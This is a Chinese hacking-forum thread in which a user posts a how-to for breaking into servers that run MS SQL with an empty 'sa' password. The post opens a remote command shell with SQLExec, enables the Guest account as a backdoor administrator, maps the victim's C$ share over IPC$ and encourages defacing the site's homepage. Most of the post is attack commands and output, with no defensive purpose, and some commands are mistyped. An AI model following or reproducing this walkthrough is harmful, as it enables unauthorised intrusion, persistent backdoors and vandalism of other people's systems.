20CN网络安全小组第一代论坛
发表新主题  发表回复

个人资料 | 社区目录 用户登录 | | 论坛搜索 | 常见问题 | 论坛主页
  下一个最老的主题   下一个最新的主题
» 20CN网络安全小组第一代论坛   » 安 全 基 地   » 菜鸟乐园   » SQL漏洞的用法

   
作者 标题: SQL漏洞的用法
hacker365
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
用X-Scanner扫到美国主机1433 sa=null

你就用到工具下载里面的SQLExec.zip了。

解压后。

c:\SQLExec xxx.xxx.xxx.xxx.xxx(美国网站)

-----------------------出现远程命令行的界面 ---------------------------------------------------

SQLCmd>_ 因此!我添加了一个后门帐号!(因为其站上只有一个Adminstrator帐号! 我将Guest用户激活 SQLCmd>net user guest /actives net user guest /active:yes

The command completed successfully. 命令成功执行!!!

SQLCmd>net user guest 123456/*添加后门帐号密码!*/

net user guest 123456 The command completed sucessfully.

SQLCmd>net localgroup administrator guest /add /*将GUEST加入管理员组---当然你也可以该admin密码*/ net lovalgroup administrator guest /add The command completed successfully.

这样你就可以远程登入上去了。当然你的系统是NT !!

C:\ net use \\xxx.xxx.xxx.xxx\ipc$ "123456" /user:"guest"

The command completed sucessfully

登上去了

c:\net use y: \\xxx.xxx.xxx.xxx\c$

The command completed sucessfully

把对方的C盘影射为我们的Y盘。我们访问它的C盘就象访问我们的硬盘一样。找到他的主页目录改了他吧!

**************如果你的系统是98系列

你就要在你系统启动进去98时出现的用户和密码登陆口填上帐号:guest 密码:123456

然后在你的MS-DOS下

c:\net use \\xxx.xxx.xxx.xxx\ipc$ (你不用在这里填写密码帐号了)

The command completed sucessfully (命令成功执行)

下面的方法和前面一样了!!!!

**********************NT弱口令的使用和以上用过ipc登陆上对方主机过程一样*********************

IP: 已记录
21667314
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
你犯了一个错误知道吗?
IP: 已记录
hacker365
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
你好啊 你说说我的错误在那吗 谢谢了 大家学习学习
IP: 已记录
net-aux
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
SQLExec.zip是什么工具,哪有下载?
IP: 已记录

 
发表新主题  发表回复 关闭主题 突出主题 移动主题 删除主题 下一个最老的主题   下一个最新的主题
 - 适于打印的主题视图
转到:
联系我们 | 20CN网络安全小组

Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。